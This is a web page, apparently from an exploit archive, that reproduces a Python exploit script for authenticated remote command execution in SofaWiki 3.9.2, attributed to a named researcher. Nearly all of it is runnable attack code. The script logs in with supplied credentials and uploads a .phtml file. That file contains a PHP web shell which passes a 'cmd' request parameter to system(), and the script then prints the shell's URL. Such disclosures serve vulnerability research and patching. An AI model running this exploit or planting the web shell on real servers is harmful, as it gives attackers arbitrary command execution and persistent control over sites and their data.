扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 |
# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = { "submitlogin": "Login", "username": username, "pass": password, "name": "SofaWiki", "action": "login" } print("Exploiting...") time.sleep(1) response = session.post(login_url, data=login_data) if "Logout" not in response.text: print("Login failed:", response.text) sys.exit() print("Login Successful") time.sleep(1) php_shell_code = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ print("Shell uploading...") time.sleep(1) upload_url = f"{base_url}/index.php" files = { "uploadedfile": (filename, php_shell_code, "text/php"), "action": (None, "uploadfile"), "MAX_FILE_SIZE": (None, "8000000"), "filename": (None, filename), "content": (None, "content") } response = session.post(upload_url, files=files) if response.status_code == 200: print(f"Your shell is ready: {base_url}/site/files/{filename}") else: print("Upload failed:", response.text) if __name__ == "__main__": main() |
体验盒子
